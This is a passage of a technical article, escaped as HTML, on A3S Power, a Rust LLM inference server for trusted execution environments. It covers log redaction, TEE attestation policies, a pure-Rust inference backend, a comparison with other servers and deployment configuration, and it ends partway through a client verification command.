    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;model_name&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;ChatRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Pin&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Box&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="k"&gt;dyn&lt;/span&gt; &lt;span class="n"&gt;Stream&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;Item&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;ChatResponseChunk&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="c1"&gt;// ...&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Audit log persistence&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;AuditLogger&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="k"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;AuditEvent&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;flush&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
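
&lt;p&gt;To make the &lt;code&gt;sanitize_error&lt;/code&gt; hook above concrete, here is a minimal sketch of what a redacting implementation could look like. The struct name, key list, and token-splitting strategy are invented for illustration, not taken from the a3s-power source:&lt;/p&gt;

```rust
// Hypothetical sketch, not the actual a3s-power source: a redactor that
// could back the `sanitize_error` extension point, scrubbing sensitive
// `key=value` pairs from error strings before they reach the logs.

const SENSITIVE_KEYS: &[&str] = &["api_key", "model_key", "authorization", "token"];

struct Redactor;

impl Redactor {
    fn sanitize_error(&self, err: &str) -> String {
        err.split_whitespace()
            .map(|tok| {
                // Redact any key=value pair whose key looks sensitive.
                if let Some((k, _v)) = tok.split_once('=') {
                    if SENSITIVE_KEYS
                        .iter()
                        .any(|s| k.to_ascii_lowercase().contains(s))
                    {
                        return format!("{k}=[REDACTED]");
                    }
                }
                tok.to_string()
            })
            .collect::<Vec<_>>()
            .join(" ")
    }
}

fn main() {
    let out = Redactor.sanitize_error("upstream 401: api_key=sk-abc123 model=llama3.2:3b");
    assert_eq!(out, "upstream 401: api_key=[REDACTED] model=llama3.2:3b");
    println!("{out}");
}
```

&lt;p&gt;The value of routing every error through one such hook is that no call site can accidentally log a raw upstream error containing key material.&lt;/p&gt;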



&lt;h3&gt;
  
  
  TEE Policy Engine
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;TeePolicy&lt;/code&gt; trait demonstrates the flexibility of extension points:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;TeePolicy&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;is_allowed&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;tee_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;TeeType&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;validate_measurement&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three preset policies:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;permissive()&lt;/code&gt;&lt;/strong&gt;: Allows all TEE types, no measurement check. For development environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;strict()&lt;/code&gt;&lt;/strong&gt;: Only allows hardware TEE (sev-snp, tdx), rejects simulation mode. For production environments&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom&lt;/strong&gt;: Fine-grained control via allowlists and measurement mappings&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When the &lt;code&gt;A3S_POWER_TEE_STRICT=1&lt;/code&gt; environment variable is set, the system automatically removes "simulated" from the allowlist — a safety guardrail preventing accidental use of simulation mode in production.&lt;/p&gt;
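
&lt;p&gt;A custom policy of the third kind might be sketched like this. The &lt;code&gt;AllowlistPolicy&lt;/code&gt; type, its fields, and constructor are invented here for illustration; only the &lt;code&gt;TeePolicy&lt;/code&gt; trait shape follows the article:&lt;/p&gt;

```rust
// Hypothetical sketch of a custom TeePolicy: allowlist plus an optional
// pinned measurement. The AllowlistPolicy type is invented for this example.

#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum TeeType {
    SevSnp,
    Tdx,
    Simulated,
}

pub trait TeePolicy: Send + Sync {
    fn is_allowed(&self, tee_type: TeeType) -> bool;
    fn validate_measurement(&self, measurement: &[u8]) -> bool;
}

pub struct AllowlistPolicy {
    allowed: Vec<TeeType>,
    pinned_measurement: Option<Vec<u8>>,
}

impl AllowlistPolicy {
    /// `strict` mirrors the A3S_POWER_TEE_STRICT=1 guardrail: simulation
    /// is stripped from the allowlist regardless of what the caller passed.
    pub fn new(mut allowed: Vec<TeeType>, pinned: Option<Vec<u8>>, strict: bool) -> Self {
        if strict {
            allowed.retain(|t| *t != TeeType::Simulated);
        }
        Self { allowed, pinned_measurement: pinned }
    }
}

impl TeePolicy for AllowlistPolicy {
    fn is_allowed(&self, tee_type: TeeType) -> bool {
        self.allowed.contains(&tee_type)
    }

    fn validate_measurement(&self, measurement: &[u8]) -> bool {
        // No pinned measurement means "accept anything" (permissive).
        self.pinned_measurement
            .as_deref()
            .map_or(true, |pinned| pinned == measurement)
    }
}

fn main() {
    // In a3s-power, `strict` would come from A3S_POWER_TEE_STRICT=1.
    let policy = AllowlistPolicy::new(
        vec![TeeType::SevSnp, TeeType::Simulated],
        Some(vec![0xAA; 48]),
        true,
    );
    assert!(policy.is_allowed(TeeType::SevSnp));
    assert!(!policy.is_allowed(TeeType::Simulated)); // stripped by strict mode
    assert!(policy.validate_measurement(&[0xAA; 48]));
    println!("strict policy ok");
}
```

&lt;p&gt;Passing &lt;code&gt;strict = true&lt;/code&gt; reproduces the &lt;code&gt;strict()&lt;/code&gt; preset's behavior: even a misconfigured allowlist cannot smuggle simulation mode into production.&lt;/p&gt;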




&lt;h2&gt;
  
  
  10. Why Pure Rust? The Trust Ledger of Supply Chain Auditing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Can You Audit It All?
&lt;/h3&gt;

&lt;p&gt;In a TEE environment, every line of code on the inference path is part of the Trusted Computing Base (TCB). The larger the TCB, the larger the attack surface, and the harder the audit.&lt;/p&gt;

&lt;p&gt;C/C++ code is the biggest risk source in security auditing — buffer overflows, use-after-free, and uninitialized memory account for a large share of serious vulnerabilities; Microsoft and the Chromium project have each attributed roughly 70% of their serious security bugs to memory safety issues.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: Pure Rust Inference Path
&lt;/h3&gt;

&lt;p&gt;A3S Power provides the &lt;code&gt;tee-minimal&lt;/code&gt; build configuration — one of the smallest auditable LLM inference stacks available today:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Build Config&lt;/th&gt;
&lt;th&gt;Inference Backend&lt;/th&gt;
&lt;th&gt;Dependency Tree Lines&lt;/th&gt;
&lt;th&gt;C Dependencies&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;default&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;mistralrs (candle)&lt;/td&gt;
&lt;td&gt;~2,000&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;tee-minimal&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;picolm (pure Rust)&lt;/td&gt;
&lt;td&gt;~1,220&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;llamacpp&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;llama.cpp&lt;/td&gt;
&lt;td&gt;~1,800+&lt;/td&gt;
&lt;td&gt;Yes (C++)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The &lt;code&gt;tee-minimal&lt;/code&gt; configuration includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;picolm backend&lt;/strong&gt;: ~4,500 lines of pure Rust implementing a complete transformer forward pass. Zero C dependencies — the entire inference path can be audited with nothing beyond the Rust toolchain&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complete TEE stack&lt;/strong&gt;: attestation, model integrity (SHA-256), log redaction, memory zeroing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Encrypted model loading&lt;/strong&gt;: AES-256-GCM, supports in-memory and streaming decryption&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RA-TLS transport&lt;/strong&gt;: attestation embedded in X.509 certificate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vsock transport&lt;/strong&gt;: for communication inside a3s-box MicroVM
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build minimal TEE configuration&lt;/span&gt;
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt; &lt;span class="nt"&gt;--no-default-features&lt;/span&gt; &lt;span class="nt"&gt;--features&lt;/span&gt; tee-minimal
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For TEE deployments, pure Rust means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Auditable scope&lt;/strong&gt;: ~1,220 dependency-tree lines versus 2,000+ in the default build, roughly 40% less code to audit&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No C/C++ toolchain&lt;/strong&gt;: No need to trust the correctness of gcc/clang compilers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Memory safety guarantees&lt;/strong&gt;: Rust compiler verifies memory safety at compile time, no runtime checks needed&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Minimized &lt;code&gt;unsafe&lt;/code&gt; blocks&lt;/strong&gt;: &lt;code&gt;unsafe&lt;/code&gt; in picolm is only used for mmap and madvise system calls, each individually auditable&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  picolm Is Not a Toy
&lt;/h3&gt;

&lt;p&gt;picolm is a complete, production-ready transformer inference engine:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Attention mechanism&lt;/strong&gt;: Multi-head attention + Grouped Query Attention (GQA), supports Q/K/V bias (Qwen, Phi)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Feed-forward network&lt;/strong&gt;: SwiGLU (LLaMA, Mistral, Phi) and GeGLU (Gemma) activation variants&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Positional encoding&lt;/strong&gt;: RoPE with pre-computed cos/sin tables, supports partial dimensions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Normalization&lt;/strong&gt;: RMSNorm, per-layer on-demand dequantization&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dequantization&lt;/strong&gt;: Q4_K, Q5_K, Q6_K, Q8_0, Q4_0, F16, F32&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Fused kernels&lt;/strong&gt;: Dequantization + dot product in single pass, no intermediate buffers&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Parallel computation&lt;/strong&gt;: Rayon multi-threaded row-parallel matrix multiply&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FP16 KV cache&lt;/strong&gt;: Half-precision storage, memory halved&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BPE tokenizer&lt;/strong&gt;: Complete GPT-style byte pair encoding, supports ChatML templates&lt;/li&gt;
&lt;/ul&gt;
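
&lt;p&gt;The "fused kernels" point above can be sketched in simplified form over a Q8_0-style layout (one f32 scale per block of 32 quantized values). The type and function names here are invented and real picolm kernels cover more formats, but the core trick is the same: multiply-accumulate straight from the quantized form, so the dequantized buffer is never materialized:&lt;/p&gt;

```rust
// Hypothetical sketch of a fused dequantize + dot-product kernel over a
// Q8_0-style layout (one f32 scale per block of 32 quantized values).
// Names are invented for illustration, not taken from the picolm source.

const BLOCK: usize = 32;

struct BlockQ8 {
    scale: f32,      // per-block scale factor
    qs: [i8; BLOCK], // quantized weights
}

/// y = sum_i (scale * qs[i]) * x[i], computed in a single pass.
fn dot_q8(blocks: &[BlockQ8], x: &[f32]) -> f32 {
    assert_eq!(blocks.len() * BLOCK, x.len());
    blocks
        .iter()
        .zip(x.chunks_exact(BLOCK))
        .map(|(b, xs)| {
            // Accumulate the raw quantized products, then apply the
            // scale once per block instead of once per element.
            let acc: f32 = b.qs.iter().zip(xs).map(|(&q, &xv)| q as f32 * xv).sum();
            b.scale * acc
        })
        .sum()
}

fn main() {
    let block = BlockQ8 { scale: 0.5, qs: [2; BLOCK] };
    let x = vec![1.0_f32; BLOCK];
    let y = dot_q8(&[block], &x);
    assert!((y - 32.0).abs() < 1e-6); // 32 elements * (0.5 * 2 * 1.0)
    println!("{y}");
}
```

&lt;p&gt;Row-parallelism then falls out naturally: each output row of a matrix multiply is an independent call to a kernel like this, which is exactly the shape Rayon parallelizes well.&lt;/p&gt;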




&lt;h2&gt;
  
  
  11. Compared to Ollama, vLLM, TGI — Where's the Gap?
&lt;/h2&gt;

&lt;p&gt;The table tells the story:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Capability&lt;/th&gt;
&lt;th&gt;Ollama&lt;/th&gt;
&lt;th&gt;vLLM&lt;/th&gt;
&lt;th&gt;TGI&lt;/th&gt;
&lt;th&gt;A3S Power&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;OpenAI-compatible API&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;GPU acceleration&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Streaming&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;TEE hardware isolation (SEV-SNP / TDX)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Remote attestation (hardware-signed proof)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Model attestation binding&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RA-TLS (attestation in TLS handshake)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Encrypted model loading (AES-256-GCM, 3 modes)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deep log redaction (10 keys + error sanitization)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory zeroing (zeroize on drop)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Client verification SDK&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hardware signature verification (AMD KDS / Intel PCS)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Layer-streaming inference (10B model in 256MB)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Multi-backend auto-routing (edge→GPU TEE seamless upgrade)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pure Rust inference path (fully auditable)&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;--&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  When Should You Use A3S Power?
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Use A3S Power:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You process regulated data (SOX, GLBA, HIPAA, GDPR) and need technical guarantees rather than policy promises&lt;/li&gt;
&lt;li&gt;You run a multi-tenant AI platform that needs hardware-level tenant isolation&lt;/li&gt;
&lt;li&gt;You must prove to clients or auditors that inference data was never leaked&lt;/li&gt;
&lt;li&gt;Your model weights are core intellectual property that must be protected from operator copying&lt;/li&gt;
&lt;li&gt;You need a 10B model making security decisions on $10 hardware with 256MB of RAM&lt;/li&gt;
&lt;li&gt;You deploy at the edge: IoT gateways, embedded devices, memory-constrained containers&lt;/li&gt;
&lt;li&gt;Your supply-chain security policy requires a fully auditable inference path (no C/C++ dependencies)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Use traditional inference servers:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You deploy internally and fully trust your infrastructure&lt;/li&gt;
&lt;li&gt;Latency is critical and TEE overhead is unacceptable&lt;/li&gt;
&lt;li&gt;You need maximum GPU utilization (e.g. vLLM's PagedAttention)&lt;/li&gt;
&lt;li&gt;The data you process is not sensitive&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  12. If You Need to Deploy Today
&lt;/h2&gt;

&lt;p&gt;If you need to get A3S Power running today, here's what you need to know.&lt;/p&gt;

&lt;h3&gt;
  
  
  Fastest Start: Development Mode
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# power.hcl — minimal config&lt;/span&gt;
&lt;span class="nx"&gt;bind&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0"&lt;/span&gt;
&lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11434&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Start&lt;/span&gt;
a3s-power &lt;span class="nt"&gt;--config&lt;/span&gt; power.hcl

&lt;span class="c"&gt;# Pull a model&lt;/span&gt;
curl &lt;span class="nt"&gt;-X&lt;/span&gt; POST http://localhost:11434/v1/models/pull &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{"model": "qwen2.5:0.5b"}'&lt;/span&gt;

&lt;span class="c"&gt;# Inference (same experience as Ollama)&lt;/span&gt;
curl http://localhost:11434/v1/chat/completions &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-H&lt;/span&gt; &lt;span class="s2"&gt;"Content-Type: application/json"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-d&lt;/span&gt; &lt;span class="s1"&gt;'{"model": "qwen2.5:0.5b", "messages": [{"role": "user", "content": "hello"}]}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Production Mode: Full TEE
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# power.hcl — production TEE config&lt;/span&gt;
&lt;span class="nx"&gt;bind&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"0.0.0.0"&lt;/span&gt;
&lt;span class="nx"&gt;port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11434&lt;/span&gt;
&lt;span class="nx"&gt;tls_port&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;11443&lt;/span&gt;

&lt;span class="c1"&gt;# TEE security&lt;/span&gt;
&lt;span class="nx"&gt;tee_mode&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;ra_tls&lt;/span&gt;   &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;model_hashes&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="s2"&gt;"llama3.2:3b"&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"sha256:a1b2c3d4e5f6..."&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="nx"&gt;model_signing_key&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"a1b2c3d4..."&lt;/span&gt;

&lt;span class="c1"&gt;# Encrypted models&lt;/span&gt;
&lt;span class="nx"&gt;in_memory_decrypt&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;model_key_source&lt;/span&gt;  &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"A3S_MODEL_KEY"&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Privacy protection&lt;/span&gt;
&lt;span class="nx"&gt;redact_logs&lt;/span&gt;             &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;span class="nx"&gt;suppress_token_metrics&lt;/span&gt;  &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Build minimal TEE binary&lt;/span&gt;
cargo build &lt;span class="nt"&gt;--release&lt;/span&gt; &lt;span class="nt"&gt;--no-default-features&lt;/span&gt; &lt;span class="nt"&gt;--features&lt;/span&gt; tee-minimal

&lt;span class="c"&gt;# Start inside SEV-SNP VM&lt;/span&gt;
&lt;span class="nv"&gt;A3S_MODEL_KEY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"your-64-hex-char-key"&lt;/span&gt; a3s-power &lt;span class="nt"&gt;--config&lt;/span&gt; power.hcl
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Client Verification
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Verify the server's TEE attestation&lt;/span&gt;
a3s-power-verify &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--url&lt;/span&gt; https://your-server:11443 &lt;span class="se"&gt;\&lt;/span&gt;
